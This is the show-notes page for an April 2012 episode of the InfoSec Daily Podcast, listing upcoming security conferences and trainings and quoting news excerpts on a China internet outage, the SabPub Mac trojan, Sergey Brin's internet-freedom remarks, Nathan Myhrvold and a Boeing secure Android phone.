			<content:encoded><![CDATA[<h1 dir="ltr" id="internal-source-marker_0.3266563656603654" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 646 for April 16, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Dave Kennedy, Rick Hayes, Beau Woods, and Karthik Rangarajan. &nbsp;</span></h1>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Co-Host Varun Sharma.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://arstechnica.com/tech-policy/news/2012/04/great-firewall-hiccup-china-loses-internet-connectivity-for-an-hour.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/04/great-firewall-hiccup-china-loses-internet-connectivity-for-an-hour.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thursday Internet traffic dropped off substantially to and from China. Paul Mozur of the Wall Street Journal&#39;s China Real Time blog tracked the outage as a data dropoff lasting from 11:00am to 1:00pm local time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The interruption spawned a host of possible explanations. These included the powerful 8.6 magnitude earthquake the day before off the coast of Indonesia, a cinching down of the &quot;Great Firewall of China&quot; censorship system, a failure in the country&#39;s network backbone, and a software upgrade.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a bottleneck of undersea cables in the Malacca Straits which could have been affected by the quake. China is connected to the Internet from only three major points, as the Guardian notes in its coverage. This makes the country arguably more vulnerable than countries like the US.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Xu Chuanchao, an executive with Sohu, one of China&#39;s largest Web portals, posted to his microblog his opinion that &quot;This malfunction is caused by the failure of China&#39;s backbone network and is under renovation.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The publication also pointed out that many &quot;lesser known VPNs seemed to connect without any problems.&quot; and quoted David Wolf of Wolf Group Asia as saying, &quot;It&#39;s possible they were short of capacity and that&#39;s why some people got through, but given that obscure VPNs were working I find that hard to believe.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.cio.com/article/704343/Two_More_Mac_Trojans_Discovered_but_Don_t_Panic"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/704343/Two_More_Mac_Trojans_Discovered_but_Don_t_Panic</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the outbreak of the Flashback Mac Trojan, security researchers have spotted two more cases of Mac OS X malware. The good news is most users have little reason to worry about them.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both cases are variants on the same Trojan, called SabPub, Kaspersky Lab Expert Costin Raiu wrote on Securelist.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first variant is known as Backdoor.OSX.SabPub.a. Like Flashback, this new threat was likely spread through Java exploits on Websites, and allows for remote control of affected systems. It was created roughly one month ago.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fortunately, this malware isn&#39;t a threat to most users for a few reasons: It may have only been used in targeted attacks, Raiu wrote, with links to malicious Websites sent via e-mail, and the domain used to fetch instructions for infected Macs has since been shut down.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Furthermore, Apple&#39;s security update for Flashback helps render future Java-based attacks harmless. In addition to removing the Flashback malware, the update automatically deactivates the Java browser plug-in and Java Web Start if they remain unused for 35 days. Users must then manually re-enable Java when they encounter applets on a Web page or a Web Start application.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The second SabPub variant is old-school compared to its sibling. Instead of attacking through malicious Websites, it uses infected Microsoft Word documents as vector, distributed by e-mail.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.zdnet.com/blog/facebook/google-facebook-and-apple-threaten-internet-freedom/11805"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/facebook/google-facebook-and-apple-threaten-internet-freedom/11805</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Back in September 2011, a Google executive said Facebook was becoming &ldquo;a closed walled garden&rdquo;. Google co-founder Sergey Brin has now taken that comment further, saying that Facebook is becoming a threat to the Internet, along with Apple, and of course the various governments trying to censor their citizens. Just last week, the hacktivist group Anonymous hacked three U.K. government websites over what it called the country&rsquo;s &ldquo;draconian surveillance proposals&rdquo; and &ldquo;derogation of civil rights.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brin&rsquo;s comments were made to</span><a href="http://www.guardian.co.uk/technology/2012/apr/15/web-freedom-threat-google-brin"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Guardian</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The threat to the freedom of the internet comes, he claims, from a combination of governments increasingly trying to control access and communication by their citizens, the entertainment industry&rsquo;s attempts to crack down on piracy, and the rise of &ldquo;restrictive&rdquo; walled gardens such as Facebook and Apple, which tightly control what software can be released on their platforms.</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">He said he was most concerned by the efforts of countries such as China, Saudi Arabia and Iran to censor and restrict use of the internet, but warned that the rise of Facebook and Apple, which have their own proprietary platforms and control access to their users, risked stifling innovation and balkanising the web.</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There&rsquo;s a lot to be lost,&rdquo; he said. &ldquo;For example, all the information in apps &ndash; that data is not crawlable by web crawlers. You can&rsquo;t search it.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brin argued he and co-founder Larry Page would not have been able to create Google if Facebook had been there first. This is because search engines require an open Web, and too many rules not only close it down, but they &ldquo;stifle innovation,&rdquo; Brin said. He of course didn&rsquo;t mention anything about Google&rsquo;s Search plus Your World (SPYW) feature, which mainly prioritizes Google+ over other social networks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.geekwire.com/2012/how-nathan-myhrvold-almost-invented-the-iphone/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.geekwire.com/2012/how-nathan-myhrvold-almost-invented-the-iphone/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A cover story in Men&rsquo;s Journal, called &ldquo;</span><a href="http://www.mensjournal.com/nathan-myhrvold"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">How a Geek Grills a Burger</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,&rdquo; casts the former Microsoft chief technology officer as a &ldquo;mad scientist&rdquo; living out a &ldquo;nerd fantasy.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He has a bestselling six-volume cookbook, he studied astrophysics with Stephen Hawking, and his giant Tyrannasaurus rex skeleton has turned his waterfront home into a tourist attraction.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And yes, by the way, he tried to convince Microsoft to make the iPhone, basically, more than two decades ago. From the piece &hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 1991, Myhrvold predicted the emergence of the iPhone down to the smallest detail, describing a &ldquo;digital wallet&rdquo; that would consolidate all personal communication &mdash; telephone, schedule manager, notepad, contacts, and a library of music and books, all in one. It would record and archive everything you asked it to, he surmised. &ldquo;The cost will not be very high,&rdquo; he wrote. &ldquo;It is pretty easy to imagine a $400 to $1,000 retail price.&rdquo; Microsoft, however, was too cost conscious and risk averse to execute Myhrvold&rsquo;s vision. &ldquo;Hey, it was better than predicting the wrong thing,&rdquo; Myhrvold says now.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.examiner.com/computers-in-denver/boeing-prepares-an-ultra-secure-smartphone"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.examiner.com/computers-in-denver/boeing-prepares-an-ultra-secure-smartphone</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier this week, it was revealed that aerospace firm Boeing was working on a high security mobile device for the various intelligence departments. This device will most likely be released later this year, and at a lower price point than other mobile phones targeted at the same communities. Typically, phones in this range cost about $15,000-$20,000 per phone, and use custom hardware and software to get the job done. This phone will most likely use Android as its main operating system of choice, which lowers the cost per phone, since Boeing&#39;s developers don&#39;t have to write their own operating system from scratch.</span><a href="http://www.examiner.com/computers-in-denver/boeing-prepares-an-ultra-secure-smartphone-picture"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Click here to see pictures</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a welcome move by Boeing, as there are not many high security devices out on the market today. Additionally, any lowering of the price point for these phones is refreshing, as that would make it slightly cheaper to run operations. Boeing also stated that this is the first time that they have ever designed a mobile phone. It is also unknown which version of Android the phone will be running, but one would assume that it will be a version of Android 4.0.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reasoning Boeing provided for this move was that it noticed a trend among its own employees that they have been wondering why the technology that they use at work isn&#39;t as good as the technology they use at home. This used to not be the case, and that&#39;s the main reason why Boeing choose to use Android as the Operating System.</span></p>
